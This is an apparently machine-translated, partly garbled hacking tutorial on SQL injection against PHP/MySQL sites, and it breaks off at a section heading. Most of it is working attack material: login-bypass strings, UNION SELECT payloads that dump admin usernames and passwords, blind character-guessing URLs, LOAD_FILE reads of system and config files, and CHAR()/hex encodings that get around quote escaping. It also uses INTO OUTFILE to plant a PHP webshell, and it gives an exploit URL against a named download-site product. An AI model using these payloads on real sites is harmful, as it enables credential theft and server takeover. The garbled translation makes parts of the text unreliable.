PHP Injection Attack is the most popular way of attack today, with its powerful flexibility to attract the vast number.
In the previous issue, "PHP Safety and Injection Topics" Zhonglin .Linx mainly tells the various vulnerabilities of the PHP program, but also the problem of PHP mysql injection, but the problem of injection is relatively small, let us feel that there is no happiness. .
OK, I will blow the PHP mysql injection for everyone's porter, so you will make you full of money (Who throws bricks!).
This article is mainly serving the small dishes. If you are already a old bird, some things will feel more boring, but as long as you look at it, you will find a lot of interesting things.
Read this article, you only have to understand this thing below.
1. I understand how the PHP MySQL environment is built, and the related articles we have included in the CD, if you are not very clear about building a PHP MySQL environment, please check this article first, introduced in the previous topic. .
2. Probably understand the configuration of PHP and Apache, mainly used in php.ini and httpd.conf
And this article we mainly use is the configuration of PHP.ini. For security, we generally open the security model in php.ini, that is, let Safe_Mode = ON, and one is to return to PHP execution errors, which will return a lot of useful information, so we should close it.
That is, after the Display_errors = OFF turns off error display, the PHP function will not be displayed to the user again.
In the PHP configuration file php.ini has a very important configuration option MAGIC_QUOTES_GPC, the high version of the default is magic_quotes_gpc = ON, only in the original antique PHP
The default configuration is magic_quotes_gpc = OFF, but the antique thing is also used!
When Magic_QUOTES_GPC = ON occurs during php.ini, there is no panic, the sky is can't collapse! It is just to automatically turn all the '(single quotes), "(dual quotes), / (double quotes), / (double quotes), and empty characters in the submitted variable, such as turning' into / ', Turn / become //.
That's it, let us very bad, many times we have to say Byebye to the characters.
But don't be discouraged, we still have a good way to deal with it, look down!
3. Have a certain PHP language basis and understand some SQL statements, these are very simple, we use something very little, so charging and oh!
Let's take a look at Magic_QUOTES_GPC = OFF, we can do it, then we will find a way to engage in magic_quotes_gpc = ON
One: Magic_quotes_GPC = OFF injection attack
Magic_quotes_gpc = Off Although it is very unsafe, the new version will also make
Magic_quotes_gpc = ON, but in many servers we have found Magic_QUOTES_GPC = Off, for example, www.qichi. *.
There are some programs like the VBB forum, even if you configure magic_quotes_gpc = ON, it will automatically eliminate the escape character, let us have organic multiplication, so say
Magic_quotes_GPC = OFF injection method is also a big market.
Below we will introduce a few aspects of syntax, injecting point and injection type, Mysql PHP injection A: first from MySQL grammar
1. Let's talk about some Mysql's basic syntax, and it is a child who has not studied it. ~ _ ~
1) SELECT
SELECT [straight_join] [SQL_SMALL_RESULT]
SELECT_EXPRESSION, ...
[INTO {OUTFILE | DUMPFILE} 'file_name' export_options]
[From Table_References
[Where where_definition]
[Group by col_name, ...]
[Order by {unsigned_integer | col_name | formula} [ASC | DESC], ...]
]
Commonly used, select_expression refers to the columns you want to retrieve, and then we can use WHERE to limit the conditions, we can also use Into Outfile to output the select result to the file. Of course, we can also use SELECT directly to
E.g
MySQL> SELECT 'A';
-
| a |
-
| a |
-
1 row in set (0.00 sec)
Please see the Mysql Chinese Manual 7.12.
Here are some utilization.
See the code first
This code is used to search.
.........
Select * from users where username Like '% $ search%' Order by Username
.......
?>
Here us in contact with the wildcard in MySQL, '%' is a wildcard, and other wildcards have '*' and '_', where "*" is used to match the field name, and "%" is used to match the field value, pay attention What% must be applied with Like, there is a wildcard, which is the underscore "_", which is different from the meaning and the above, is used to match any single character. In the above code, we use '*' to indicate all field names returned, and% $ search% indicate all content that contains $ Search characters.
How do we inject?
Haha, it is very similar to the ASP.
Submit in the form
AABB% 'OR 1 = 1 Order by ID #
Note: # # m m 中 l l 即 l l l l l l l l l l l l 不 不 不 l 不 不
Perhaps someone will ask why I want 1 = 1, look at it,
Bring the submitted content into the SQL statement
Select * from users where username like '% aabb%' or 1 = 1 Order by ID # Order by Username
If there is no user name containing AABB, or 1 = 1 makes the return value true, enabling all values
We can still do this
Submit in the form
% 'Order By ID #
or
'Order by ID #
Brought into the SQL statement
Select * from users where username like '%%' Order by ID # Order by username
with
Select * from users where username like '%%' Order by ID # Order by Username
Of course, the content is returned.
List all users, no password is coming out. Here is an example, there will be a more exquisite SELECT statement, and select is almost everywhere!
2) Look at UPDATE
This explanation in mysql Chinese manual:
Update [low_priority] TBL_NAME SET col_name1 = expr1, col_name2 = expr2, ...
[Where where_definition]
Update updates the column of the existing table in the new value, and the set clause indicates which column to modify and they should be given, where clauses, if give, specify which line should be updated, otherwise all rows are updated.
Details go to the mysql Chinese manual 7.17, the words that will be detailed here will be very proud.
It is understood that Update is mainly used for data updates, such as the modification of the article, and the modification of user information, we seem to be more concerned, because ...
See the code first
Let's give the structure of the table first, so everyone understands
Create Table Users
ID INT (10) Not Null Auto_Increment,
Login Varchar (25),
Password varchar (25),
Email varchar (30),
UserLevel Tinyint,
Primary Key (ID)
)
Among them, the userlevel represents the level, 1 is administrator, 2 is ordinary users
//rChange.php
......
$ SQL = "Update users set password = '$ pass', email = '$ email' where id = '$ ID'"
......
?>
OK, we started to inject it, add Email where we add
Netsh @ 163.com ', Userlevel =' 1
The SQL statement is executed
Update users set password = 'YOUPASS',
Email = 'netsh @ 163.com', userlevel = '1' where id = 'YOUID'
Look at our Userlevel is 1, become an administrator.
Haha, so cool, it is a must-have for home travel.
Here we simply mention the problem of single quotation, if only one single quotes are used without single quotes, the system will return an error. Column Types are divided into digital types, date and time types, string types, however quotes are generally used in string types, and in digital types, ordinary people will not use quotation marks (however it can be used, and power is very powerful Large), date and time types are rarely used for injection (because few submitted time variables). In the following we will detail these types of injection methods!
3) The next round to INSERT, it has been waiting for impatient, just like the students in the noon cafeteria.
PHP Chinese manual teaches us:
INSERT [low_priority | delayed] [ignore]
[INTO] TBL_NAME [(col_name, ...)]]
VALUES (Expression, ...), (...), ...
INSERT Inserts a new line into an existing table, insert ... Values form, based on the explicit specified value inserted, insert ... select the line selected from other tables, there are multiple values of INSERT. .. VALUES is supported in MySQL 3.22.5 or later, col_name = expression syntax is supported in MySQL 3.22.10 or later. It can be seen that in order to see the background, INSERT mainly appears in a registered place, or there are other places where you submit it.
Look at the structure of the table
Create Table MEMBRES
ID VARCHAR (15) Not null default '',
Login Varchar (25),
Password varchar (25),
Email varchar (30),
UserLevel Tinyint,
Primary Key (ID)
)
We still assume that userLevel represents the user level, 1 for the manager, 2 is ordinary users.
code show as below
//reg.php
......
$ query = "INSERT INTO MEMBERS VALUES ('$ ID', '$ login', '$ Pass', '$ Email', '2')
......
?>
Default Insert User Level is 2
Now we build the injecting statement.
Still entering the Email where you want to enter:
Netsh@163.com ',' 1 ') #
The SQL statement is turned to:
INSERT INTO MEMBRES VALUES ('Youid', 'YOUNAME', 'YOUPASS', 'Netsh@163.com', '1') # ',?')
It is an administrator to see if we register.
# 号 What said, not forgot, dizzy, so fast?
Forget, forget it, let you talk about it in detail.
2. Let's talk about the comments in MySQL, this is very important, you can't sleep anymore, if you sleep, you will hang you when you go to the end of the exam.
We continue
I believe that everyone has seen the powerful role of the comment in several examples, here we will introduce it in detail.
Mysql has three comment sentences
# 注 掉 本 本 本 内容
- Injection effect same #
/ * ... * / Note part of the symbol
For ## will be our most commonly used annotation method.
- Remember that there is a space behind you to get an annotation.
/*...*/ We generally use the front / * is enough, because we can't do it behind, right?
Note: When the browser address bar is input #, you should write it into% 23, so that after the Urlencode conversion can be converted #, it is a role in the comment. # 号 Your words in the browser address box are not ok.
For everyone to understand
Here I will give you an example.
Some administrator information table
Create Table Alphaauthor (
ID tinyint (4) Not null auto_increment,
Username varchar (50) Not null default ',
Password varchar (50) Default Null,
Name varchar (50) Default Null,
Primary Key (ID),
UNIQUE Key ID (ID),
Key ID_2 (ID)
)
//Login.php
......
$ query = "SELECT * from alphaauthor where username = '$ usrname' and password = '$ passwd'"; $ results = mysql_query ($ query);
$ DATA = mysql_fetch_Array ($ Result);
IF ($ DATA)
{
ECHO "important information";
}
Else
Echo "landing failed";
......
?>
We enter directly in the browser address box
http://***/login.php? username = a'or id = 1% 23
% 23 Convert into #
Put it in the SQL statement
Select * from alphaauthor where username = 'a'or id = 1 #' and password = '$ passwd'
# 号, I have entered it, see
This sentence is equivalent to
Select * from alphaauthor where username = 'a'or id = 1
Take a closer look at the structure of the table, as long as there is ID = 1 account, the returned $ data should be true.
We will log in directly, of course you can write
HPPT: //***/login.php? UserName = a'or 1 = 1% 23
Like
3. The following is to appear ...
Yes, the spies of these display system information
Version () Returns the database version information
Database () Returns the current database name if there is no current database, Database () returns an empty string.
User ()
SYSTEM_USER ()
Session_user ()
Return the current mysql username
Mysql> Select user (), database (), version ();
---------------- ----------------
User () | Database () | Version () |
---------------- ----------------
Root @ localhost | alpha | 5.0.0-alpha-nt |
---------------- ----------------
1 row in set (0.01 sec)
As shown in Figure (1), isn't it very cool? Well, your big eyes are good.
Sometimes it is useful, for example, you can see if his mysql has overflow vulnerabilities according to his mysql version, if we find a good moving Donghaha
4. The most important part is entered below, and I haven't slept, I wake up awake.
1) SELECT UNION SELECT
Or PHP Chinese manual:
Select ... union [all] select ... [union select ...]
Union is implemented in MySQL 4.0.0.
UNION is used to combine the results of multiple SELECT statements to a result set.
The columns listed in the Select_expression section of the Select must have the same type. The column name used in the first SELECT query will return to the column names of the result set.
The select command is a normal selection command, but there are the following restrictions:
Only the last select command can have Into Outfile. It should be noted that the number of SELECT fields before and after UNION is the same, and only the UNION function can play a role. If the number of fields will be returned
Error 1222 (21000): The Used SELECT STATEments HAVE A DIFFERENT NUMBER OF Column Error
Dizziness, this is not good. Is it half?
Don't happe, no use
E.g:
It is known that the alphadb table has 11 columns
we
Mysql> Select * from alphadb where id = 351 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 from alphaauthor
Figure (2)
We only Slect has 10 numbers of course.
Below
Mysql> Select * from alphadb where id = 347 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 from alphaauthor
Figure (3)
Let's take a look at the data in ID = 247
MySQL> SELECT * from alphadb where id = 347;
--- ------------------------------------------- - -----------------
| ID | TITLE | Content | ImportTime | Author | Accessing | AddInto | Type | Showup | Change_UBB | Change_HTML |
--- ------------------------------------------- - -----------------
| 347 | Take advantage of adsutil.vbs ..- published in the Man Association 2004.6 | Posted in Hacker X Archive Phase 6 | 2004
-03-28 11:50:50 | Alpha | 17 | ALPHA | 2 | 1 | 1 | 1 |
--- ------------------------------------------- - -----------------
1 row in set (0.00 sec)
We see that it returns the result and
Mysql> Select * from alphadb where id = 347 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 from alphaauthor
Are the same.
Oh, everyone may ask, what is the use?
Asked good.
OK, continue trial
When we enter a non-existing id
For example ID = 0, or ID = 347 and 1 <> 1
Look at it again
Mysql> Select * from alphadb where id = 347 and 1 <> 1 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 from alphaauthor
Figure (4)
We found that it gave all the items 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 to each field.
Haha, finally showed a different, but what is this?
Don't tell you first.
We tell a specific example first
http://localhost/site/display.php? id = 347
Look at Figure 5
Http://localhost/site/display.php?id = 347 and 1 <> 1 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 from alphaauthor results as shown in Figure 6
Below we use a picture to summarize the usage of Union as shown in Figure 7
OK, know how to use it? If you don't know, you will tell you in detail.
2) Load_file
This feature is too powerful, which is also the method mentioned in the last topic. Although I said, I have to mention it.
Load_file can return the content of the file, remember to write a full file path and file name
ETC.
We entered in MySQL command line
MySQL> SELECT LOAD_FILE ('c: /boot.ini');
Effect is shown in Figure (8)
But how do we do it in the web?
We can use Union Select usage
http://localhost/site/display.php? id = 347% 20and% 201 <> 1% 20Union% 20Select% 201, 2, LOAD_FILE ('c: /apache/htdocs/site/lib/sql.inc') 4, 5, 6, 7, 8, 9, 10, 11
Here C: /Apache/htdocs/site/lib/sql.inc is not my profile,: P
Look carefully in Figure 9
Look, the document content is undoubted.
Why do we put load_file ('c: /apache/htdocs/site/lib/sql.inc') 3 fields? We mention that there are three types of column types, and the place where 3 in Figure 7 is displayed should be displayed in the article, and should be character type, and load_file ('c: / apache / htdocs / site / lib / sql. INC ') is also a character type, so we speculate that it can be displayed smoothly in 3 fields.
In fact, there are still a lot of good use methods, continue to look down!
3) Select * from table instfile'file.txt '
Is there any?
The role is to write the content of the table to the file, know more important, we write a WebShell, haha.
Of course, we are not just exporting tables, we can also export other things, look down.
Suppose there is a table below
#
# 数据 数据 结构 结构 `Test`
#
Create Table Test
A Text,
B Text
ENGINE = myisam default charSet = latin1;
#
# Export the following database content` Test`
#
INSERT INTO TEST VALUES (', NULL);
I know my website path in c: / apache / htdocs / site /
Ok, see you show, type
Http://localhost/site/display.php? ID = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, 2, A, 4, 5, 6, 7, 8, 9, 10, 11% 20FROM% 20Test% 20InTo% 20Outfile% 20'c: /apore/htdocs/site/cmd.php '
It means to export contents in the table to cmd.phphuang
Take a look at the content in cmd.php
1 2 000-00-00 00:00:00 5 6 7 8 9 10 11
Let's take a look
http://localhost/site/cmd.php? cmd = DIR as shown in Figure (10)
Haha, it's really cool!
4) Let's tell you about the story of Load Data Infile
Load Data [Low_Priority] [local] infile 'file_name.txt' [Replace | ignore] INTO TABLE TBL_NAME
The Load Data INFILE statement reads a table in a text file in a very high speed.
Because this statement is generally entered directly in the browser, it is not very big.
Here is an example to say
Table Test structure and the same introduction above
#
# 数据 数据 结构 结构 `Test`
#
Create Table Test
A Text,
B Text
ENGINE = myisam default charSet = latin1;
We entered in the mysql command line:
MySQL> Load Data Infile 'C: /Cmd.php' Into Table Test
Where c: / cmd.php content is
Note: The above content is written in a row.
We use the above instructions to enter the content of cmd.asp into the TEST table.
The result of the result is shown in Figure (11)
In fact, it is the content in the last example TEST table! Take a look, combined with Into Outfile, is it a perfect combination?
The basic syntax will come here, there may be a lot of important things miss, you can go to the PHP Chinese manual, I believe you will find a lot of good things, tap it. (With Disc, we pay a php Chinese manual)
B: From the injection method
Mainly digital, character types and search classes
Digital
Very common, we have always been a character type, you should still remember how to break the administrator password under the ASP, let's take a look at how to implement the PHP.
We entered in the address bar:
http://localhost/site/display.php? id = 451% 20and% 201 = (Select% 20min (ID)% 20FROM% 20alphaauthor)
Determine whether there is alphaauthor, if there is a normal page (general situation, sometimes it returns something, this is mainly based on the page of the configuration 1 = 1 and 1 = 2)
http://localhost/site/display.php? id = 451% 20and% 201 = (Select% 20min (ID)% 20FROM% 20Lphaauthor% 20where% 20Length (username) = 5)
Judging whether the length of the username field is 5
http://localhost/site/display.php? id = 451% 20and% 201 = (select% 20min (ID)% 20FROM% 20LPhaauThor% 20where% 20Length (username) = 5% 20ance% 20Length (password) = 32)
It's almost the same, judge the length of the Password field.
The following is the stage of guess code, and a speculation is used to use the ASCII method. Ascii is equivalent to ASC, haha, often watching hacker X files must be clear.
http://localhost/site/display.php? id = 451% 20and% 201 = (Select% 20min (ID)% 20FM% 20alphaauthor% 20where% 20ASCII (MID (username, 1, 1)) = 97) User name The first place, ascii97 is character a.
http://localhost/site/display.php? id = 451% 20And% 201 = (select% 20min (ID)% 20FROM% 20alphaauthor% 20where% 20ASCII (MID (username, 2, 1)) = 108)
The second place, here only put this picture, as shown (12)
The X bar is omitted below.
Anyway, we finally got the username and password.
We will find that the injection method here is almost the same as the injection under the ASP. It is to turn the ASC into Ascii, turn the Len to Length, and finally we can get the background administrator account and password.
Of course, we have a simpler way, you can directly get directly with Union methods.
Http://localhost/site/display.php? ID = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, UserName, Password, 4, 5, 6, 7, 8, 9, 10, 11% 20FROM% 20alphaauthor
Figure (13)
The account is Alpha, the password is a long string of stuff, haha, simple and clear, see no, here there is no power, the powerful power of Union Select.
What is told above is to guess content in a unconfigured table. If we can be like this in the same table:
One of the following sections displays user information according to user ID
//User.php
...........
$ SQL = "SELECT * from user where id = $ ID";
..........
IF (! $ results)
{
Echo "WRONG";
EXIT;
}
Else
Echo "User Information";
?>
The speculation method is almost the same, that is, we don't have to use SELECT.
We entered
http://localhost/user.php? id = 1 and length (password) = 7
Show user information Description We guess the correct, huh, huh, comeon
http://localhost/user.php? id = 1 And ascii (MID (Password, 1, 1)) = 97
First password
http://localhost/user.php? id = 1 And ASCII (MID (Password, 2, 1)) = 97
Second,
Through this method, we can also get the account password for id = 1 users.
2. Let's take a look at the way of injection of characters.
The implantation method of the character model in the ASP is flexible, and the injection of character model in PHP is mainly
Magic_quotes_GPC = OFF is carried out. (Unless there is another situation, don't tell you first)
E.g:
//display.php
......
$ query = "select * from alphadb where id = '". $ ID. "'";
............
?>
Such ID will become a characteristic.
I don't know if you have found it. If we write the program like this, security will improve.
Oh, continue, we have inspected whether there is injection first
Http://localhost/site/display.php? id = 451 'and 1 = 1 and' '='
http://localhost/site/display.php? id = 451 'and 1 = 2 and' '='
Brought into the SQL statement is
SELECT * from alphadb where id = '451'and 1 = 1 and' '=' '
SELECT * from alphadb where id = '451'and 1 = 2 and' '=' '
If you find that the page information is different, the vulnerability exists.
or
http://localhost/site/display.php? id = 451 'and 1 = 1% 23
http://localhost/site/display.php?id = 451 'and 1 = 2% 23
% 23 is the conversion of #, ie the meaning of the comment, saying it above.
In this way, you don't have to consider the closure problem of the quotation marks. I actually recommend this method.
Bring it into the SQL statement.
Select * from alphadb where id = '451'and 1 = 1 #'
It is what we want!
Look at the effect,
http://localhost/site/display.php? id = 451 'and 1 = 1% 23
Figure (14)
Normal display!
http://localhost/site/display.php?id = 451 'and 1 = 2% 23
Figure (15)
Show abnormal, haha, explain the problem
We continue:
Http://localhost/site/display.php? id = 451 '% 20and% 201 = 2% 20% 20Union% 20Select% 201, UserName, Password, 4, 5, 6, 7, 8, 9, 10 ,11 % 20FROM% 20alphaauthor% 23
Look at the picture (16)
OK, username and password come out again!
3. Let's take a look at the search type.
Search type of statement is generally written
//search.php
......
$ query = "SELECT * from alphadb where title Like '% $ title%'
............
?>
I don't know if you still remember the injection in the ASP?
But I don't remember that there is no relationship, let's see it.
We build the injecting statement
Enter the input box
A% 'and 1 = 2 Union Select 1, username, 3, 4, 5, 6, 7, 8, password, 10, 11 from alphaauthor # put it in the SQL statement into
Select * from alphadb where title Like '% a%' and 1 = 2 Union SELECT 1, UserName, 3, 4, 5, 6, 7, 8, password, 10 ,11 from alphaauthor #%
The result is shown in Figure 17.
How, come out, haha, everything is in progress.
C: Let's take a look at various injection attacks from the injecting place.
1) Let's take a look at the background.
//login.php
.......
$ query = "select * from alphaauthor where username = '"
. $ Http_post_vars ["Username"]. "'And
Password = '"" $ http_post_vars ["password"]. "'";
$ result = mysql_query ($ query);
$ DATA = mysql_fetch_Array ($ Result);
IF ($ DATA)
{
Echo "Successful Landing";
}
ESLE
{
Echo "re-landing";
EXIT;
}
.........
?>
UserName and Password have not been putted directly in SQL through any handle.
See how we get worse?
The most classic or that:
Enter in the username and password box
'Or' '='
Brought into the SQL statement
Select * from alphaauthor where username = '' or '=' 'and password =' 'or' '=' '
In this way, $ DATA is definitely true, that is, we have successfully logged in.
There are other bypassing methods, the principle is the same, that is, try to let $ data return to be true.
We can use the following Chinese law.
1.
Username and password are entered to 'or'a' = 'a
SQL became
Select * from alphaauthor where username = '' OR'A '=' a 'and password =' 'or'a' = 'a'
2.
Username and password are input to 'or 1 = 1 and' '='
SQL became
Select * from alphaauthor where username = 'or 1 = 1 and' '=' 'and password =' 'or 1 = 1 and' '=' '
Username and password are input to 'or 2> 1 and' '='
SQL became
Select * from alphaauthor Where username = '' or 2> 1 and '' = '' and password = '' or 2> 1 and '' = ''
3.
User Name Enter 'or 1 = 1 # Password Casual Enter
SQL became
Select * from alphaauthor where username = '' or 1 = 1 # and password = 'anything'
The back is commented out, of course, returns or really.
4.
Assume that admin Id = 1, you can also
Username Enter 'OR ID = 1 # Password Input
SQL became
Select * from alphaauthor where username = '' or id = 1 # and password = 'Anything' As shown in Figure 18
Look at the renderings 19
how about it? Log in directly!
As the saying goes, I don't think I can't do it.
There are more constructors waiting for the class to think about it.
2) The second commonly injected place should be regarded as a front desk.
I have already mentioned many times, and it involves digital type, character type, etc., this is no longer repeated here.
Just give an example review
Bihai Chao Download Station - V2.0.3 Lite has injected vulnerabilities, the code is no longer listed.
Direct view
Http://localhost/down/index.php? URL = & dlid = 1% 20and% 201 = 2% 20Union% 20Select% 201, 2, Password, 4, Username, 6, 7, 8, 9, 10 ,11, 12, 13, 14, 15, 16, 17, 18% 20FROM% 20DL_USERS
Figure 20
Look, we get what we want.
User name alpha
Password a long string.
Why we have to put password in 3 fields, put username at 5 fields, we have already mentioned it, that is, we speculate that 3 and 5 paragraphs should be a string type, and we want to display UserName The field type of Password should be the same, so we put it like this.
Why use 18 fields? I don't know if you still remember that we mention that UNION SELECT must require the same number of select before and after, we can speculate in the number of SELECTs to guess the need for 18 fields, only the content of the Union Select will be displayed normally. Oh!
3) Others such as data modification, where users are registered to have a user level application.
We have already told the update and insert above, because it is not very common, this is no longer elaborated, and some advanced utilization skills on Update and Insert will be mentioned below.
2: The injection attack teaching link will be entered below Magic_QUOTES_GPC = ON.
When Magic_QUOTES_GPC = ON, all the '(single quotes) in the handed variables,
"(Double Quotes), / (reverse slope) and empty characters will automatically turn into an escape character with a backslapped line.
This makes a method of injection into bubbles. At this time, we can only inject digital type and not
INTVAL () has been handled, and the digital type has been speaking a lot, because the digital type is not used to single quotes naturally have no problem, we can inject it directly for this situation.
1) If it is a character type, it must be like this, and there is no quotation number on characters.
Here we have to use some string processing functions,
There are a lot of string handle functions, which we mainly speak the following, and you can refer to the mysql Chinese reference manual 7.4.10.
Char () interprets the parameters as integers and returns a string consisting of these integers.
Of course, you can use the 16 credits of characters instead of characters, which is ok, the method is to add 0x in front of the 16-encyclopedia, see the example below.
//login.php
......
$ query = "select * from". $ art_system_db_table ['user']. "
Where username = usrname and password = '". $ PW."' ";
......
?>
Suppose we know that the user name of the background is alpha
After converting into ASCII, it is Char (97, 108, 112, 104, 97)
Transforming into 16-based 0x616c706861
(We will provide 16 credits and ASCII conversion tools in the CD)
Ok, enter directly in your browser:
http://localhost/site/admin/login.php? username = char (97, 108, 112, 104, 97)% 23
SQL statement becomes:
Select * from alphaauthor where username = char (97, 108, 112, 104, 97) # and password = ''
Figure 21
As we expect, he successfully implemented, we got what we wanted.
Of course, we can also construct this
http://localhost/site/admin/login.php? username = 0x616c706861% 23
SQL statement becomes:
Select * from alphaauthor where username = 0x616c706861% 23 # and password = ''
We once again be a success. Very sense of accomplishment,
Maybe you will ask us if you can put # it in char ()
In fact, Char (97, 108, 112, 104, 97) is equivalent to 'alpha'
Note that Alpha adds quotation marks to represent the alpha string.
We know if executed in mysql
MySQL> Select * from dl_users where username = alpha;
Error 1054 (42S22): Unknown Column 'Alpha' in 'Where Clause'
Look at the return error. Because he will think that Alpha is a variable. So we have to add quotation marks on Alpha.
as follows
Mysql> Select * from dl_users where username = 'alpha';
This is correct.
If you go to the ##, you will become 'alpha #'
Bring the SQL statement
Select * from dl_users where username = 'alpha #';
Of course, it is ok, because even alpha # this user is not.
Ok, let's take an example below.
//display.php
......
$ query = "select * from". $ art_system_db_table ['article']. "
Where type = $ TYPE;
......
?>
The code displays the content according to the type, and $ TYPE does not filter and there is no additional number in the program.
Suppose Type contains xiaohua class, Xiaohua's char () conversion is
CHAR (120, 105, 97, 111, 104, 117, 97)
We build
Http://localhost/display.php? type = char (120, 105, 97, 111, 104, 117, 97) and 1 = 2 Union Select 1, 2, UserName, 4, Password, 6, 7, 8, 9, 10, 11 from alphaauthor
Bring the SQL statement:
Select * from ". $ art_system_db_table ['article']."
WHERE TYPE = CHAR (120, 105, 97, 111, 104, 117, 97) and 1 = 2 Union SELECT 1, 2, UserName, 4, Password, 6, 7, 8, 9, 10 ,11 from alphaauthor Look, our username and password still Oh! No screenshot, imagine it: P
2) Maybe someone will ask, can you still use the powerful load_file () in the case of magic_quotes_gpc = ON?
This is exactly what we have to be willing. The use format of load_file () is LOAD_FILE ('file path')
We have found that just convert the 'file path' to char (). Try it
Load_file ('c: /boot.ini') is transformed into
Load_file (CHAR (99, 58, 47, 98, 111, 111, 116, 46, 105, 110, 105))
Figure 22
Put it in the specific injection
Http://localhost/down/index.php? URL = & dlid = 1% 20and% 201 = 2% 20Union% 20Select% 201, 2, Load_File (CHAR (99, 58, 47, 98, 111, 111, 116, 46, 105, 110, 105)), 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18
See Figure 23
Look, we saw the content of boot.ini.
Unfortunately, INTO OUTFILE '' can't be bypassed, otherwise it is more cool. But there is still a place to use Select * from table intfile '', ... (first sell a Cat, will tell you below)
Three: Some injection skills, many are all personal discovery.
1.Union select skills
UNION is used to combine the results of multiple SELECT statements to a result set. The columns listed in the Select_expression section of the Select must have the same type. The column name used in the first SELECT query will return to the column names of the result set.
However, we can speculate in the type of column with the following method, but save a lot of time
Let's first
Http://localhost/down/index.php? URL = & dlid = 1% 20and% 201 = 2% 20Union% 20Select% 201, 2, 3, 4, 5, 6, 7, 8, 9, 10 ,11, 12, 13, 14, 15, 16, 17, 18
Figure 24
Look at the software description 3, the author is written 4, we can guess the position of 3 and 4 is the character, we look at the number of downloads in front, this should be int type, right .
Ok, we build it according to here, it is estimated that UserName and Password are also characterized.
Try it
Http://localhost/down/index.php? URL = & dlid = 1% 20and% 201 = 2% 20Union% 20Select% 201, 2, Password, 4, Username, 6, 7, 8, 9, 10 ,11, 12, 13, 14, 15, 16, 17, 18% 20FROM% 20DL_USERS
Figure 25
Haha, this method can probably guessed as long as you see.
2.Load_file read and write the skills
I don't know if you have found that we can't display in the web when we use Load_File () to read and write PHP files. E.g:
'C: /apache/htdocs/site/lib/sql.inc.php' Transformation to 16 Enterprises: 0x433A2F6170616368652F6874646F63732F736974652F69622F73716C2E696E632E706870 We construct as follows
http: //localhost/site/display.php id = 451% 20and% 201 = 2% 20% 20union% 20select% 201,2, load_file (0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870), 4,5,6,7,8,9,10? 11
Figure 26
It is found that the place in the article is originally displayed, but it is empty, why?
Let's take a look at the source code of the web page
Figure 27
Haha, look at the marked place, dizzy, it is here, but why?
Original HTML <> for labeling, haha, understand! You can remember where to find it next time.
4. MD5 nightmare
Dr. Wang, the University of Shandong University, has recently engaged in MD5, and we will come to work, we are more cool than him, don't calculate, haha.
MD5 we have a way to bypass, but not where you can, the MD5 function in PHP can not be bypassed, because all things you entered are in it, it is not running. The MD5 in the SQL statement can be bypassed. Of course, the functions in SQL can be bypass, the truth is the same.
See example first:
//login.php
......
$ query = "SELECT * from alphaauthor where username = md5 ($ usrname) and password = '". $ PW. "'";
......
?>
We are submitted directly in the browser
HTTP: /LOGIN.PHP? Username = char (97,98)) OR 1 = 1% 23
Brought into the SQL statement to become a select * from alphaauthor where username = md5 (Char (97,98)) or 1 = 1 #) and password = '"". $ PW. "
Remember that the MD5 is like a character, because there is OR 1 = 2 behind, so we just put a char (97, 98). OK, the landing is successful! Look, MD5 is not used in front of us.
5. Core technology, using PHP MySQL injection vulnerability directly to WebShell. .
Direct use of injection to get WebShell, this should be everyone thinking, let you teach you below.
Here to assume that you already know the physical path where the site is located, I assume that the website path is c: / apache / htdocs / site. The mysql connection information of the website is placed in /lib/sql.inc.php
1) Applicable to Magic_QUOTES_GPC = OFF
Suppose we can upload pictures, or txt, zip, and so on, we change our Trojan to
JPG suffix, uploaded path to /upload/2004091201.jpg
2004091201.JPG
Ok, we start http: //localhost/site/display.php? Id = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, 2, LOAD_FILE ('c: / apache / htdocs / site / upload / 2004091201.jpg '), 4, 5, 6, 7, 8, 9, 10, 11% 20Into% 20Outfile'c: /apache/htdocs/site/shell.php' Because of Outfile, the web page is not normal, But our task is completed.
Figure 28
Let's take a look at http://localhost/site/shell.php? Cmd = DIR
Figure 29
Suffen? WebShell we have created success. Did you see the front 12? That is, we are output from SELECT 1, 2!
2) The method of saving WebShell when it is suitable for Magic_quotes_GPC = ON, obviously, can be used when Magic_QUOTES_GPC = OFF is time.
We read his profile directly, the method introduced by skill 2
http: //localhost/site/display.php id = 451% 20and% 201 = 2% 20% 20union% 20select% 201,2, load_file (0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870), 4,5,6,7,8,9,10? 11
Get the content of SQL.inc.php
Ok, we know the mysql root password, we found the background of phpmyadmin
http: // localhost / phpmyadmin /
Use the root password to log in.
Figure 30
Then we newly established a table structure is as follows:
#
# 数据 数据 结构 结构 `TE`
#
Create Table Te (
CMD text Not Null
ENGINE = myisam default charSet = latin1;
#
# Export the following database content` TE`
#
INSERT INTO TE VALUES ('');
OK, it's time we used Select * from Table Into Outfile ''.
Directly in PHPMYADMIN SQL input
Select * from `TE` INTO OUTFILE 'C: /APACHE/HTDOCS/SITE/CMD1.PHP'
Figure 31
OK, successfully executed, let's go http://localhost/site/cmd1.php? Cmd = DIR to see the effect
Figure 32
A good WebShell is! Haha, I also like it too.
But I don't know if you find that we have completed this work in the case of Magic_QUOTES_GPC = ON. Note PHPMYADMIN is too great, this is what we are talking about Magic_QUOTES_GPC = ON by bypassing!
6. Discover that we can also use Update and INSERT to insert our data, then get our Webshell, and use the above example,
//reg.php
......
$ query = "INSERT INTO MEMBERS
VALUES ('$ ID', '$ login', '$ pass', '$ email', '2') "; ......
?>
We entered in Email
Suppose the ID we registered is 10
Then we can find a place that can be injected.
Http://localhost/site/display.php? ID = 451% 20And% 201 = 2% 20% 20Union% 20Select% 201, 2, Email, 4, 5, 6, 7, 8, 9, 10 ,11% 20FROM% 20User% 20where% 20ID = 10% 20 INTO% 20Outfile'c: /apore/htdocs/site/test.php '
Ok, we have our wenshell.
7.Mysql's cross-library query
